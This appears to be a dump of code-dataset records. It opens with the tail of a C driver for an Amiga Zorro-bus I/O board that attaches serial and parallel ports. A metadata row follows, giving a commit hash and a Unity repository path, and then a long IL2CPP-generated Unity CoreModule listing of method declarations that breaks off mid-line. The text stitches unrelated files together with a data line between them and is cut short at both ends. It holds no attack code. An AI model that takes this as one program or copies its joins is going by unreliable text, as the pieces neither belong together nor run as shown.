iobzmatch(parent, cfp, auxp)
struct device *parent;
struct cfdata *cfp;
void *auxp;
{
struct zbus_args *zap;
zap = auxp;
if (zap->manid != 4711)
return (0);
if (zap->prodid != 1)
return (0);
return (1);
}
struct iobz_devs {
char *name;
unsigned off;
int arg;
} iobzdevices[] = {
{ "com", 0x100, 24000000 },
{ "com", 0x108, 24000000 },
{ "com", 0x110, 24000000 },
{ "com", 0x118, 24000000 },
{ "lpt", 0x200, 0 },
{ "lpt", 0x300, 0 },
{ 0, 0, 0}
};
void
iobzattach(parent, self, auxp)
struct device *parent, *self;
void *auxp;
{
struct iobz_softc *iobzsc;
struct iobz_devs *iobzd;
struct zbus_args *zap;
struct supio_attach_args supa;
extern const struct amiga_bus_space_methods amiga_bus_stride_16;
volatile u_int8_t *p;
iobzsc = (struct iobz_softc *)self;
zap = auxp;
if (parent)
printf("\n");
iobzsc->sc_bst.base = (u_long)zap->va;
iobzsc->sc_bst.absm = &amiga_bus_stride_16;
supa.supio_iot = &iobzsc->sc_bst;
supa.supio_ipl = 6;
iobzd = iobzdevices;
while (iobzd->name) {
supa.supio_name = iobzd->name;
supa.supio_iobase = iobzd->off;
supa.supio_arg = iobzd->arg;
config_found(self, &supa, iobzprint); /* XXX */
++iobzd;
}
p = (volatile u_int8_t *)zap->va + 2;
*p = ((*p) & 0x1F) | 0x80;
}
int
iobzprint(auxp, pnp)
void *auxp;
const char *pnp;
{
struct supio_attach_args *supa;
supa = auxp;
if (pnp == NULL)
return(QUIET);
printf("%s at %s port 0x%02x",
supa->supio_name, pnp, supa->supio_iobase);
return(UNCONF);
}
| 25.834356 | 78 | 0.709095 |
fd398b7bae0ccd8024a4cd4dfc1447d9d19baccd | 792,085 | c | C | AR_Motive/Test_APK_acceleratore_BackUpThisFolder_ButDontShipItWithYourGame/il2cppOutput/UnityEngine.CoreModule_CodeGen.c | simofilipp/ARMotive_PJ | 334d7a3decfcdd2c39c3ea5b1073aee7c39a027f | [
"Unlicense"
] | null | null | null | AR_Motive/Test_APK_acceleratore_BackUpThisFolder_ButDontShipItWithYourGame/il2cppOutput/UnityEngine.CoreModule_CodeGen.c | simofilipp/ARMotive_PJ | 334d7a3decfcdd2c39c3ea5b1073aee7c39a027f | [
"Unlicense"
] | null | null | null | AR_Motive/Test_APK_acceleratore_BackUpThisFolder_ButDontShipItWithYourGame/il2cppOutput/UnityEngine.CoreModule_CodeGen.c | simofilipp/ARMotive_PJ | 334d7a3decfcdd2c39c3ea5b1073aee7c39a027f | [
"Unlicense"
] | null | null | null | #include "pch-c.h"
#ifndef _MSC_VER
# include <alloca.h>
#else
# include <malloc.h>
#endif
#include "codegen/il2cpp-codegen-metadata.h"
// 0x00000001 System.Void Microsoft.CodeAnalysis.EmbeddedAttribute::.ctor()
extern void EmbeddedAttribute__ctor_m93D23E0241AEA98DE88285ECFB378AAD361CDC83 (void);
// 0x00000002 System.Void System.Runtime.CompilerServices.IsReadOnlyAttribute::.ctor()
extern void IsReadOnlyAttribute__ctor_m627542EC70C984B1DB3E6F048AE53E121339B9BF (void);
// 0x00000003 System.Void AOT.MonoPInvokeCallbackAttribute::.ctor(System.Type)
extern void MonoPInvokeCallbackAttribute__ctor_mF43F06AF092A13B71E6D0C5456A5FC5ABDCC5893 (void);
// 0x00000004 System.Void UnityEngineInternal.MathfInternal::.cctor()
extern void MathfInternal__cctor_mC2F676B6F0CC5E10406BB514D669BD196368295F (void);
// 0x00000005 System.Void UnityEngineInternal.TypeInferenceRuleAttribute::.ctor(UnityEngineInternal.TypeInferenceRules)
extern void TypeInferenceRuleAttribute__ctor_m356F2A18ACB338DE48EADD04E97C971C554EDDE0 (void);
// 0x00000006 System.Void UnityEngineInternal.TypeInferenceRuleAttribute::.ctor(System.String)
extern void TypeInferenceRuleAttribute__ctor_mECD854F0BC27EC215F4BD1C6F0CECA9BEC090E0D (void);
// 0x00000007 System.String UnityEngineInternal.TypeInferenceRuleAttribute::ToString()
extern void TypeInferenceRuleAttribute_ToString_m009A152A07FC88BF49F1C72FC615F2FB7350F2BD (void);
// 0x00000008 System.Void UnityEngineInternal.GenericStack::.ctor()
extern void GenericStack__ctor_mD21753D674298C09F3684F19DD42680323055586 (void);
// 0x00000009 System.Void Unity.Profiling.ProfilerMarker::.ctor(System.String)
extern void ProfilerMarker__ctor_mDD68B0A8B71E0301F592AF8891560150E55699C8 (void);
// 0x0000000A Unity.Profiling.ProfilerMarker/AutoScope Unity.Profiling.ProfilerMarker::Auto()
extern void ProfilerMarker_Auto_m133FA724EB95D16187B37D2C8A501D7E989B1F8D (void);
// 0x0000000B System.Void Unity.Profiling.ProfilerMarker/AutoScope::.ctor(System.IntPtr)
extern void AutoScope__ctor_m7F63A273E382CB6328736B6E7F321DDFA40EA9E3 (void);
// 0x0000000C System.Void Unity.Profiling.ProfilerMarker/AutoScope::Dispose()
extern void AutoScope_Dispose_mED763F3F51261EF8FB79DB32CD06E0A3F6C40481 (void);
// 0x0000000D System.IntPtr Unity.Profiling.LowLevel.Unsafe.ProfilerUnsafeUtility::CreateMarker(System.String,System.UInt16,Unity.Profiling.LowLevel.MarkerFlags,System.Int32)
extern void ProfilerUnsafeUtility_CreateMarker_m27DDE00D41B95677982DBFCE074D45B79E50C7CC (void);
// 0x0000000E System.Void Unity.Profiling.LowLevel.Unsafe.ProfilerUnsafeUtility::BeginSample(System.IntPtr)
extern void ProfilerUnsafeUtility_BeginSample_m1C6D6ED1C8E0CB2FD0934EB6EA333276F67C14F6 (void);
// 0x0000000F System.Void Unity.Profiling.LowLevel.Unsafe.ProfilerUnsafeUtility::EndSample(System.IntPtr)
extern void ProfilerUnsafeUtility_EndSample_mE2F7A0DB4C52105F7CD135ED8816A2BB98E663CC (void);
// 0x00000010 System.Void Unity.Jobs.IJob::Execute()
// 0x00000011 Unity.Jobs.JobHandle Unity.Jobs.IJobExtensions::Schedule(T,Unity.Jobs.JobHandle)
// 0x00000012 System.Void Unity.Jobs.IJobExtensions/JobStruct`1::Execute(T&,System.IntPtr,System.IntPtr,Unity.Jobs.LowLevel.Unsafe.JobRanges&,System.Int32)
// 0x00000013 System.Void Unity.Jobs.IJobExtensions/JobStruct`1::.cctor()
// 0x00000014 System.Void Unity.Jobs.IJobExtensions/JobStruct`1/ExecuteJobFunction::.ctor(System.Object,System.IntPtr)
// 0x00000015 System.Void Unity.Jobs.IJobExtensions/JobStruct`1/ExecuteJobFunction::Invoke(T&,System.IntPtr,System.IntPtr,Unity.Jobs.LowLevel.Unsafe.JobRanges&,System.Int32)
// 0x00000016 System.Void Unity.Jobs.IJobParallelFor::Execute(System.Int32)
// 0x00000017 Unity.Jobs.JobHandle Unity.Jobs.IJobParallelForExtensions::Schedule(T,System.Int32,System.Int32,Unity.Jobs.JobHandle)
// 0x00000018 System.Void Unity.Jobs.IJobParallelForExtensions/ParallelForJobStruct`1::Execute(T&,System.IntPtr,System.IntPtr,Unity.Jobs.LowLevel.Unsafe.JobRanges&,System.Int32)
// 0x00000019 System.Void Unity.Jobs.IJobParallelForExtensions/ParallelForJobStruct`1::.cctor()
// 0x0000001A System.Void Unity.Jobs.IJobParallelForExtensions/ParallelForJobStruct`1/ExecuteJobFunction::.ctor(System.Object,System.IntPtr)
// 0x0000001B System.Void Unity.Jobs.IJobParallelForExtensions/ParallelForJobStruct`1/ExecuteJobFunction::Invoke(T&,System.IntPtr,System.IntPtr,Unity.Jobs.LowLevel.Unsafe.JobRanges&,System.Int32)
// 0x0000001C System.Void Unity.Jobs.JobHandle::Complete()
extern void JobHandle_Complete_mDCED35A125AAB37EDDAB2E31C805B4904B614A4A (void);
// 0x0000001D System.Boolean Unity.Jobs.JobHandle::get_IsCompleted()
extern void JobHandle_get_IsCompleted_m834D40CA77C5F2EC575592BD5DEB60B66ACCF941 (void);
// 0x0000001E System.Void Unity.Jobs.JobHandle::ScheduleBatchedJobs()
extern void JobHandle_ScheduleBatchedJobs_mD80F0AB54AEA1D1A107F4B7B84EE5288FD895A93 (void);
// 0x0000001F System.Void Unity.Jobs.JobHandle::ScheduleBatchedJobsAndComplete(Unity.Jobs.JobHandle&)
extern void JobHandle_ScheduleBatchedJobsAndComplete_m144E743D5269628B3997C49CF662CEC9667806F2 (void);
// 0x00000020 System.Boolean Unity.Jobs.JobHandle::ScheduleBatchedJobsAndIsCompleted(Unity.Jobs.JobHandle&)
extern void JobHandle_ScheduleBatchedJobsAndIsCompleted_m43A03A48CB70913C6E2334C81CCAE5C2B9C93F21 (void);
// 0x00000021 Unity.Jobs.JobHandle Unity.Jobs.JobHandle::CombineDependencies(Unity.Jobs.JobHandle,Unity.Jobs.JobHandle)
extern void JobHandle_CombineDependencies_mC8F0655BA478BF3F10310B0E88292F1D1193E8D9 (void);
// 0x00000022 Unity.Jobs.JobHandle Unity.Jobs.JobHandle::CombineDependencies(Unity.Jobs.JobHandle,Unity.Jobs.JobHandle,Unity.Jobs.JobHandle)
extern void JobHandle_CombineDependencies_m11478F947EE83F605008092EB5C6841AFAF34D78 (void);
// 0x00000023 Unity.Jobs.JobHandle Unity.Jobs.JobHandle::CombineDependenciesInternal2(Unity.Jobs.JobHandle&,Unity.Jobs.JobHandle&)
extern void JobHandle_CombineDependenciesInternal2_m20BFAE01512A668E796AC2642AA7D25DB01849C1 (void);
// 0x00000024 Unity.Jobs.JobHandle Unity.Jobs.JobHandle::CombineDependenciesInternal3(Unity.Jobs.JobHandle&,Unity.Jobs.JobHandle&,Unity.Jobs.JobHandle&)
extern void JobHandle_CombineDependenciesInternal3_m71AB14E7E0785383C2A337564805D9A18B3F7643 (void);
// 0x00000025 System.Void Unity.Jobs.JobHandle::CombineDependenciesInternal2_Injected(Unity.Jobs.JobHandle&,Unity.Jobs.JobHandle&,Unity.Jobs.JobHandle&)
extern void JobHandle_CombineDependenciesInternal2_Injected_mB9AE570247CDA3D571F854403B4464102A4C1B35 (void);
// 0x00000026 System.Void Unity.Jobs.JobHandle::CombineDependenciesInternal3_Injected(Unity.Jobs.JobHandle&,Unity.Jobs.JobHandle&,Unity.Jobs.JobHandle&,Unity.Jobs.JobHandle&)
extern void JobHandle_CombineDependenciesInternal3_Injected_m5393968E9BEF5FE959BA5617BF2A16D4B3EF5E90 (void);
// 0x00000027 System.Void Unity.Jobs.LowLevel.Unsafe.JobProducerTypeAttribute::.ctor(System.Type)
extern void JobProducerTypeAttribute__ctor_m562A2FC62E2DF7109DD703C0270B0B372607C534 (void);
// 0x00000028 System.Boolean Unity.Jobs.LowLevel.Unsafe.JobsUtility::GetWorkStealingRange(Unity.Jobs.LowLevel.Unsafe.JobRanges&,System.Int32,System.Int32&,System.Int32&)
extern void JobsUtility_GetWorkStealingRange_m941A4BC142F1C27DE003B567505EC4B221262BF2 (void);
// 0x00000029 Unity.Jobs.JobHandle Unity.Jobs.LowLevel.Unsafe.JobsUtility::Schedule(Unity.Jobs.LowLevel.Unsafe.JobsUtility/JobScheduleParameters&)
extern void JobsUtility_Schedule_m63C86A632576045CD38E98D72689F3EDCD9F4DB0 (void);
// 0x0000002A Unity.Jobs.JobHandle Unity.Jobs.LowLevel.Unsafe.JobsUtility::ScheduleParallelFor(Unity.Jobs.LowLevel.Unsafe.JobsUtility/JobScheduleParameters&,System.Int32,System.Int32)
extern void JobsUtility_ScheduleParallelFor_m425760131B06EE0CD58F834A596704AF65D162DD (void);
// 0x0000002B System.IntPtr Unity.Jobs.LowLevel.Unsafe.JobsUtility::CreateJobReflectionData(System.Type,System.Type,System.Object,System.Object,System.Object)
extern void JobsUtility_CreateJobReflectionData_mA38915E5A40FAFA940DB77B618060D9B3E8EDA1B (void);
// 0x0000002C System.IntPtr Unity.Jobs.LowLevel.Unsafe.JobsUtility::CreateJobReflectionData(System.Type,System.Object,System.Object,System.Object)
extern void JobsUtility_CreateJobReflectionData_mB75CBA88EB2ABDD80D0AA9AE04010B48A0976174 (void);
// 0x0000002D System.Void Unity.Jobs.LowLevel.Unsafe.JobsUtility::Schedule_Injected(Unity.Jobs.LowLevel.Unsafe.JobsUtility/JobScheduleParameters&,Unity.Jobs.JobHandle&)
extern void JobsUtility_Schedule_Injected_mE1C374BED8057D4BF47229EB3C1B893F56E3211C (void);
// 0x0000002E System.Void Unity.Jobs.LowLevel.Unsafe.JobsUtility::ScheduleParallelFor_Injected(Unity.Jobs.LowLevel.Unsafe.JobsUtility/JobScheduleParameters&,System.Int32,System.Int32,Unity.Jobs.JobHandle&)
extern void JobsUtility_ScheduleParallelFor_Injected_m65B74A7455652034C682B9923EBFB415E1D58068 (void);
// 0x0000002F System.Void Unity.Jobs.LowLevel.Unsafe.JobsUtility/JobScheduleParameters::.ctor(System.Void*,System.IntPtr,Unity.Jobs.JobHandle,Unity.Jobs.LowLevel.Unsafe.ScheduleMode)
extern void JobScheduleParameters__ctor_m5FFED3B28A1FA2C3EC7D1C50A7D7E788C411CE04 (void);
// 0x00000030 System.Void Unity.IL2CPP.CompilerServices.Il2CppEagerStaticClassConstructionAttribute::.ctor()
extern void Il2CppEagerStaticClassConstructionAttribute__ctor_m124F17545F01CC678CE74870FC9EE5D4891EE935 (void);
// 0x00000031 System.Void Unity.Collections.ReadOnlyAttribute::.ctor()
extern void ReadOnlyAttribute__ctor_m1AD04580EB8D01BE1657F42BB7B5B7AB7A08C90A (void);
// 0x00000032 System.Void Unity.Collections.WriteOnlyAttribute::.ctor()
extern void WriteOnlyAttribute__ctor_m90E53F74454BA0EFE06FEAB8291AEDE5F7048AE5 (void);
// 0x00000033 System.Void Unity.Collections.DeallocateOnJobCompletionAttribute::.ctor()
extern void DeallocateOnJobCompletionAttribute__ctor_m94AB41219362107F93798DC376D13E1750E5854E (void);
// 0x00000034 System.Void Unity.Collections.NativeDisableParallelForRestrictionAttribute::.ctor()
extern void NativeDisableParallelForRestrictionAttribute__ctor_m2D113DB59E3B06AF43DDDB4612EEB3A016CFA11E (void);
// 0x00000035 System.Void Unity.Collections.NativeLeakDetection::Initialize()
extern void NativeLeakDetection_Initialize_m900BC4C2835A26E5ACE3CFB8A33263AB7704EBDD (void);
// 0x00000036 System.Void Unity.Collections.NativeArray`1::.ctor(System.Int32,Unity.Collections.Allocator,Unity.Collections.NativeArrayOptions)
// 0x00000037 System.Void Unity.Collections.NativeArray`1::.ctor(Unity.Collections.NativeArray`1<T>,Unity.Collections.Allocator)
// 0x00000038 System.Void Unity.Collections.NativeArray`1::Allocate(System.Int32,Unity.Collections.Allocator,Unity.Collections.NativeArray`1<T>&)
// 0x00000039 System.Int32 Unity.Collections.NativeArray`1::get_Length()
// 0x0000003A T Unity.Collections.NativeArray`1::get_Item(System.Int32)
// 0x0000003B System.Void Unity.Collections.NativeArray`1::set_Item(System.Int32,T)
// 0x0000003C System.Boolean Unity.Collections.NativeArray`1::get_IsCreated()
// 0x0000003D System.Void Unity.Collections.NativeArray`1::Dispose()
// 0x0000003E System.Void Unity.Collections.NativeArray`1::CopyFrom(Unity.Collections.NativeArray`1<T>)
// 0x0000003F T[] Unity.Collections.NativeArray`1::ToArray()
// 0x00000040 Unity.Collections.NativeArray`1/Enumerator<T> Unity.Collections.NativeArray`1::GetEnumerator()
// 0x00000041 System.Collections.Generic.IEnumerator`1<T> Unity.Collections.NativeArray`1::System.Collections.Generic.IEnumerable<T>.GetEnumerator()
// 0x00000042 System.Collections.IEnumerator Unity.Collections.NativeArray`1::System.Collections.IEnumerable.GetEnumerator()
// 0x00000043 System.Boolean Unity.Collections.NativeArray`1::Equals(Unity.Collections.NativeArray`1<T>)
// 0x00000044 System.Boolean Unity.Collections.NativeArray`1::Equals(System.Object)
// 0x00000045 System.Int32 Unity.Collections.NativeArray`1::GetHashCode()
// 0x00000046 System.Void Unity.Collections.NativeArray`1::Copy(Unity.Collections.NativeArray`1<T>,Unity.Collections.NativeArray`1<T>)
// 0x00000047 System.Void Unity.Collections.NativeArray`1::Copy(Unity.Collections.NativeArray`1<T>,Unity.Collections.NativeArray`1<T>,System.Int32)
// 0x00000048 System.Void Unity.Collections.NativeArray`1::Copy(Unity.Collections.NativeArray`1<T>,T[],System.Int32)
// 0x00000049 System.Void Unity.Collections.NativeArray`1::Copy(Unity.Collections.NativeArray`1<T>,System.Int32,Unity.Collections.NativeArray`1<T>,System.Int32,System.Int32)
// 0x0000004A System.Void Unity.Collections.NativeArray`1::Copy(Unity.Collections.NativeArray`1<T>,System.Int32,T[],System.Int32,System.Int32)
// 0x0000004B System.Void Unity.Collections.NativeArray`1/Enumerator::.ctor(Unity.Collections.NativeArray`1<T>&)
// 0x0000004C System.Void Unity.Collections.NativeArray`1/Enumerator::Dispose()
// 0x0000004D System.Boolean Unity.Collections.NativeArray`1/Enumerator::MoveNext()
// 0x0000004E System.Void Unity.Collections.NativeArray`1/Enumerator::Reset()
// 0x0000004F T Unity.Collections.NativeArray`1/Enumerator::get_Current()
// 0x00000050 System.Object Unity.Collections.NativeArray`1/Enumerator::System.Collections.IEnumerator.get_Current()
// 0x00000051 Unity.Collections.NativeSlice`1<T> Unity.Collections.NativeSliceExtensions::Slice(Unity.Collections.NativeArray`1<T>,System.Int32,System.Int32)
// 0x00000052 Unity.Collections.NativeSlice`1<T> Unity.Collections.NativeSliceExtensions::Slice(Unity.Collections.NativeSlice`1<T>,System.Int32,System.Int32)
// 0x00000053 System.Void Unity.Collections.NativeSlice`1::.ctor(Unity.Collections.NativeSlice`1<T>,System.Int32,System.Int32)
// 0x00000054 System.Void Unity.Collections.NativeSlice`1::.ctor(Unity.Collections.NativeArray`1<T>)
// 0x00000055 Unity.Collections.NativeSlice`1<T> Unity.Collections.NativeSlice`1::op_Implicit(Unity.Collections.NativeArray`1<T>)
// 0x00000056 System.Void Unity.Collections.NativeSlice`1::.ctor(Unity.Collections.NativeArray`1<T>,System.Int32,System.Int32)
// 0x00000057 Unity.Collections.NativeSlice`1<U> Unity.Collections.NativeSlice`1::SliceConvert()
// 0x00000058 T Unity.Collections.NativeSlice`1::get_Item(System.Int32)
// 0x00000059 System.Void Unity.Collections.NativeSlice`1::set_Item(System.Int32,T)
// 0x0000005A System.Void Unity.Collections.NativeSlice`1::CopyFrom(Unity.Collections.NativeSlice`1<T>)
// 0x0000005B System.Void Unity.Collections.NativeSlice`1::CopyFrom(T[])
// 0x0000005C System.Int32 Unity.Collections.NativeSlice`1::get_Stride()
// 0x0000005D System.Int32 Unity.Collections.NativeSlice`1::get_Length()
// 0x0000005E Unity.Collections.NativeSlice`1/Enumerator<T> Unity.Collections.NativeSlice`1::GetEnumerator()
// 0x0000005F System.Collections.Generic.IEnumerator`1<T> Unity.Collections.NativeSlice`1::System.Collections.Generic.IEnumerable<T>.GetEnumerator()
// 0x00000060 System.Collections.IEnumerator Unity.Collections.NativeSlice`1::System.Collections.IEnumerable.GetEnumerator()
// 0x00000061 System.Boolean Unity.Collections.NativeSlice`1::Equals(Unity.Collections.NativeSlice`1<T>)
// 0x00000062 System.Boolean Unity.Collections.NativeSlice`1::Equals(System.Object)
// 0x00000063 System.Int32 Unity.Collections.NativeSlice`1::GetHashCode()
// 0x00000064 System.Boolean Unity.Collections.NativeSlice`1::op_Inequality(Unity.Collections.NativeSlice`1<T>,Unity.Collections.NativeSlice`1<T>)
// 0x00000065 System.Void Unity.Collections.NativeSlice`1/Enumerator::.ctor(Unity.Collections.NativeSlice`1<T>&)
// 0x00000066 System.Void Unity.Collections.NativeSlice`1/Enumerator::Dispose()
// 0x00000067 System.Boolean Unity.Collections.NativeSlice`1/Enumerator::MoveNext()
// 0x00000068 System.Void Unity.Collections.NativeSlice`1/Enumerator::Reset()
// 0x00000069 T Unity.Collections.NativeSlice`1/Enumerator::get_Current()
// 0x0000006A System.Object Unity.Collections.NativeSlice`1/Enumerator::System.Collections.IEnumerator.get_Current()
// 0x0000006B System.Void Unity.Collections.LowLevel.Unsafe.NativeContainerAttribute::.ctor()
extern void NativeContainerAttribute__ctor_m9249B57B7D6F9E1D425EC32392FB975B8568AD9B (void);
// 0x0000006C System.Void Unity.Collections.LowLevel.Unsafe.NativeContainerSupportsMinMaxWriteRestrictionAttribute::.ctor()
extern void NativeContainerSupportsMinMaxWriteRestrictionAttribute__ctor_m340DBE8A3B007A450B4643E7350C29D92514B782 (void);
// 0x0000006D System.Void Unity.Collections.LowLevel.Unsafe.NativeContainerSupportsDeallocateOnJobCompletionAttribute::.ctor()
extern void NativeContainerSupportsDeallocateOnJobCompletionAttribute__ctor_mBE27310D46174944DF46D01B8AE4BBE69DA94729 (void);
// 0x0000006E System.Void Unity.Collections.LowLevel.Unsafe.NativeContainerSupportsDeferredConvertListToArray::.ctor()
extern void NativeContainerSupportsDeferredConvertListToArray__ctor_m40F59B7627032F45D2ED023BA9525EEF40660C27 (void);
// 0x0000006F System.Void Unity.Collections.LowLevel.Unsafe.WriteAccessRequiredAttribute::.ctor()
extern void WriteAccessRequiredAttribute__ctor_mB36E4CF6313543DEB0DFA64575446C5ABB6F4C8B (void);
// 0x00000070 System.Void Unity.Collections.LowLevel.Unsafe.NativeDisableUnsafePtrRestrictionAttribute::.ctor()
extern void NativeDisableUnsafePtrRestrictionAttribute__ctor_m8E1BE43B9791FD4E5790060D6506003D35F081CC (void);
// 0x00000071 Unity.Collections.NativeArray`1<T> Unity.Collections.LowLevel.Unsafe.NativeArrayUnsafeUtility::ConvertExistingDataToNativeArray(System.Void*,System.Int32,Unity.Collections.Allocator)
// 0x00000072 System.Void* Unity.Collections.LowLevel.Unsafe.NativeArrayUnsafeUtility::GetUnsafePtr(Unity.Collections.NativeArray`1<T>)
// 0x00000073 System.Void* Unity.Collections.LowLevel.Unsafe.NativeArrayUnsafeUtility::GetUnsafeReadOnlyPtr(Unity.Collections.NativeArray`1<T>)
// 0x00000074 Unity.Collections.NativeSlice`1<T> Unity.Collections.LowLevel.Unsafe.NativeSliceUnsafeUtility::ConvertExistingDataToNativeSlice(System.Void*,System.Int32,System.Int32)
// 0x00000075 System.Void* Unity.Collections.LowLevel.Unsafe.NativeSliceUnsafeUtility::GetUnsafePtr(Unity.Collections.NativeSlice`1<T>)
// 0x00000076 System.Void* Unity.Collections.LowLevel.Unsafe.NativeSliceUnsafeUtility::GetUnsafeReadOnlyPtr(Unity.Collections.NativeSlice`1<T>)
// 0x00000077 System.Void* Unity.Collections.LowLevel.Unsafe.UnsafeUtility::Malloc(System.Int64,System.Int32,Unity.Collections.Allocator)
extern void UnsafeUtility_Malloc_mA79BF3D6FC86F67D4354A6C8481DB0F13FD6777B (void);
// 0x00000078 System.Void Unity.Collections.LowLevel.Unsafe.UnsafeUtility::Free(System.Void*,Unity.Collections.Allocator)
extern void UnsafeUtility_Free_mA951B190894E1755DE821FCBD35F7AD9FB388F18 (void);
// 0x00000079 System.Void Unity.Collections.LowLevel.Unsafe.UnsafeUtility::MemCpy(System.Void*,System.Void*,System.Int64)
extern void UnsafeUtility_MemCpy_m019E657B952C27F705607F0F3D371EEE526B716B (void);
// 0x0000007A System.Void Unity.Collections.LowLevel.Unsafe.UnsafeUtility::MemCpyReplicate(System.Void*,System.Void*,System.Int32,System.Int32)
extern void UnsafeUtility_MemCpyReplicate_m234798F59C7D37255F0DF4BD59C48A72F2D9B436 (void);
// 0x0000007B System.Void Unity.Collections.LowLevel.Unsafe.UnsafeUtility::MemCpyStride(System.Void*,System.Int32,System.Void*,System.Int32,System.Int32,System.Int32)
extern void UnsafeUtility_MemCpyStride_mE53A7840FB9957CF249E75DFFB96EAB5D29EDA34 (void);
// 0x0000007C System.Void Unity.Collections.LowLevel.Unsafe.UnsafeUtility::MemSet(System.Void*,System.Byte,System.Int64)
extern void UnsafeUtility_MemSet_mDC75E5E3857CCA05AB3AF19D53BF9DBCB21F923B (void);
// 0x0000007D System.Void Unity.Collections.LowLevel.Unsafe.UnsafeUtility::MemClear(System.Void*,System.Int64)
extern void UnsafeUtility_MemClear_m0535B03E39A2A8CF84AE517549902F0025F67460 (void);
// 0x0000007E System.Int32 Unity.Collections.LowLevel.Unsafe.UnsafeUtility::AlignOf()
// 0x0000007F T Unity.Collections.LowLevel.Unsafe.UnsafeUtility::ReadArrayElement(System.Void*,System.Int32)
// 0x00000080 T Unity.Collections.LowLevel.Unsafe.UnsafeUtility::ReadArrayElementWithStride(System.Void*,System.Int32,System.Int32)
// 0x00000081 System.Void Unity.Collections.LowLevel.Unsafe.UnsafeUtility::WriteArrayElement(System.Void*,System.Int32,T)
// 0x00000082 System.Void Unity.Collections.LowLevel.Unsafe.UnsafeUtility::WriteArrayElementWithStride(System.Void*,System.Int32,System.Int32,T)
// 0x00000083 System.Void* Unity.Collections.LowLevel.Unsafe.UnsafeUtility::AddressOf(T&)
// 0x00000084 System.Int32 Unity.Collections.LowLevel.Unsafe.UnsafeUtility::SizeOf()
// 0x00000085 System.Int32 Unity.Collections.LowLevel.Unsafe.UnsafeUtility::EnumToInt(T)
// 0x00000086 System.Void Unity.Collections.LowLevel.Unsafe.UnsafeUtility::InternalEnumToInt(T&,System.Int32&)
// 0x00000087 System.Boolean Unity.Collections.LowLevel.Unsafe.UnsafeUtility::EnumEquals(T,T)
// 0x00000088 System.Void JetBrains.Annotations.NotNullAttribute::.ctor()
extern void NotNullAttribute__ctor_mBD764326957BF5036FB7217B794F6B48B73A6B51 (void);
// 0x00000089 System.Void JetBrains.Annotations.PureAttribute::.ctor()
extern void PureAttribute__ctor_mEAFD7538811204E5F43B816F28B63FA197A6A09A (void);
// 0x0000008A System.Int32 UnityEngine.SortingLayer::GetLayerValueFromID(System.Int32)
extern void SortingLayer_GetLayerValueFromID_mBB4C1609D3D68940C64087C874E16A817D90321B (void);
// 0x0000008B System.Void UnityEngine.Keyframe::.ctor(System.Single,System.Single)
extern void Keyframe__ctor_mECF144086B28785BE911A22C06194A9E0FBF3C34 (void);
// 0x0000008C System.Void UnityEngine.Keyframe::.ctor(System.Single,System.Single,System.Single,System.Single)
extern void Keyframe__ctor_m0E7D85642F12A3DAFA1768351CC7670648C41AB2 (void);
// 0x0000008D System.Single UnityEngine.Keyframe::get_time()
extern void Keyframe_get_time_mB8886F64CBB373936C0C25C4C68397C05779F661 (void);
// 0x0000008E System.Void UnityEngine.Keyframe::set_time(System.Single)
extern void Keyframe_set_time_m98F165193486C0DF1611B562016595B18052A2D6 (void);
// 0x0000008F System.Single UnityEngine.Keyframe::get_value()
extern void Keyframe_get_value_m53E6B7609086AAAA46E24BAF734EF08E16A3FD6C (void);
// 0x00000090 System.Void UnityEngine.Keyframe::set_value(System.Single)
extern void Keyframe_set_value_m396D6040A4AB72ED5B9797E8C92DD806FA6F5431 (void);
// 0x00000091 System.Void UnityEngine.Keyframe::set_inTangent(System.Single)
extern void Keyframe_set_inTangent_m4CBBDDEE23D6E1E498580A6E1C2661E57CD38363 (void);
// 0x00000092 System.Void UnityEngine.Keyframe::set_outTangent(System.Single)
extern void Keyframe_set_outTangent_m68F2F86E292344CAB2600787D244019B95A89DFE (void);
// 0x00000093 System.Void UnityEngine.AnimationCurve::Internal_Destroy(System.IntPtr)
extern void AnimationCurve_Internal_Destroy_mDE388BCCEEA6BE0F27CEA09A047618304DEC68F6 (void);
// 0x00000094 System.IntPtr UnityEngine.AnimationCurve::Internal_Create(UnityEngine.Keyframe[])
extern void AnimationCurve_Internal_Create_m40E65549F706F1109BE743E2FCDBE06D42556499 (void);
// 0x00000095 System.Boolean UnityEngine.AnimationCurve::Internal_Equals(System.IntPtr)
extern void AnimationCurve_Internal_Equals_mEBA61732FE57654C4E3AF5B317918D1641E36050 (void);
// 0x00000096 System.Void UnityEngine.AnimationCurve::Finalize()
extern void AnimationCurve_Finalize_m803AC16166EE497C4DFA996B15692D91F4D04C3C (void);
// 0x00000097 System.Single UnityEngine.AnimationCurve::Evaluate(System.Single)
extern void AnimationCurve_Evaluate_m50B857043DE251A186032ADBCBB4CEF817F4EE3C (void);
// 0x00000098 UnityEngine.Keyframe[] UnityEngine.AnimationCurve::get_keys()
extern void AnimationCurve_get_keys_m34452C69464AB459C04BFFEA4F541F06B419AC4E (void);
// 0x00000099 System.Void UnityEngine.AnimationCurve::set_keys(UnityEngine.Keyframe[])
extern void AnimationCurve_set_keys_mBE1284B44CDBB1D8381177A3D581A6E71467F95C (void);
// 0x0000009A UnityEngine.Keyframe UnityEngine.AnimationCurve::get_Item(System.Int32)
extern void AnimationCurve_get_Item_mD4E73EE674F7A82673F1A9CEB8E5EF86BA47E64B (void);
// 0x0000009B System.Int32 UnityEngine.AnimationCurve::get_length()
extern void AnimationCurve_get_length_m259A67BB0870D3A153F6FEDBB06CB0D24089CD81 (void);
// 0x0000009C System.Void UnityEngine.AnimationCurve::SetKeys(UnityEngine.Keyframe[])
extern void AnimationCurve_SetKeys_m68D6CAD69A3023D8DA02F66890BE2E2A76ACEE6D (void);
// 0x0000009D UnityEngine.Keyframe UnityEngine.AnimationCurve::GetKey(System.Int32)
extern void AnimationCurve_GetKey_m22E6B8D1548BBE2F08141ABFBAE0BFC3779FC08E (void);
// 0x0000009E UnityEngine.Keyframe[] UnityEngine.AnimationCurve::GetKeys()
extern void AnimationCurve_GetKeys_mB151732233920FC27E3842AE48D0557F29074C29 (void);
// 0x0000009F UnityEngine.AnimationCurve UnityEngine.AnimationCurve::Linear(System.Single,System.Single,System.Single,System.Single)
extern void AnimationCurve_Linear_m9C6C4ECB6BF4F0515EBD4EFDA97CF623B92B1362 (void);
// 0x000000A0 UnityEngine.AnimationCurve UnityEngine.AnimationCurve::EaseInOut(System.Single,System.Single,System.Single,System.Single)
extern void AnimationCurve_EaseInOut_mA8461373A0FC9464E20724CAD519973F85FE4A15 (void);
// 0x000000A1 System.Void UnityEngine.AnimationCurve::.ctor(UnityEngine.Keyframe[])
